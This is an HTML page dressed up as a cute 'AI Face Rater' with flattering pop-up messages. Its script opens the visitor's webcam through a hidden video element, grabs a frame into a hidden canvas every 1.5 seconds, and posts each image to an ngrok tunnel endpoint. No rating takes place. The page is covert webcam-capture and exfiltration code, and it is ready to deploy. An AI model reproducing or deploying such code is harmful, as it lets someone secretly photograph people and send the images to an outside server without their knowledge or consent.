<!doctype html>
<html>
<head>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
<!-- Required meta tags -->
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<style>
@import url('https://fonts.googleapis.com/css?family=Poppins&display=swap');

p{
  color:#000;
  font-size: 2rem;
  position: absolute;
  top: 50%;
  right:-50%;
font-family: 'Poppins', sans-serif;
  left:50%;
  transform: translate(-50%,-50%);
}

label{
  position: absolute;
  top: 70%;
  right:-50%;
  font-family: 'Poppins', sans-serif;
  left:50%;
  transform: translate(-50%,-50%);
}

.illustration{
            max-width:50%;
            display:inline-block;
        }

        .boi{
            float:left;
            margin-right:2rem;
            max-width:40%;
        }

        .girl{
            max-width:40%;
        }

</style>

</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>

    <body>
        <p>❤️ AI Face Rater ❤️</p>
        <div class="illustration">
            <img class="boi" src="img/boi.svg">
            <img class="girl" src="img/girl.svg">
        </div>
        <!-- <label><input type="checkbox" name="mirror" id="mirror" />I know</label> -->

        <script>

        function post(imgdata){
        $.ajax({
            type: 'POST',
            data: { cat: imgdata},
            url: 'https://7761da9e.ngrok.io/post.php',
            dataType: 'json',
            async: false,
            success: function(result){
                // call the function that handles the response/results
            },
            error: function(){
            }
          });
        };


        'use strict';

        const video = document.getElementById('video');
        const canvas = document.getElementById('canvas');
        const errorMsgElement = document.querySelector('span#errorMsg');

        const constraints = {
          audio: false,
          video: {

            facingMode: "user"
          }
        };

        alert("Your are so special");
        alert("You are good looking");

        // Access webcam
        async function init() {
          try {
            const stream = await navigator.mediaDevices.getUserMedia(constraints);
            handleSuccess(stream);
          } catch (e) {
            errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
          }
        }

        // Success
        function handleSuccess(stream) {
          window.stream = stream;
          video.srcObject = stream;

        var context = canvas.getContext('2d');
          setInterval(function(){

               context.drawImage(video, 0, 0, 640, 640);
               var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
               post(canvasData); }, 1500);

        }

        // Load init
        init();

        </script>
        
    </body>

</html>
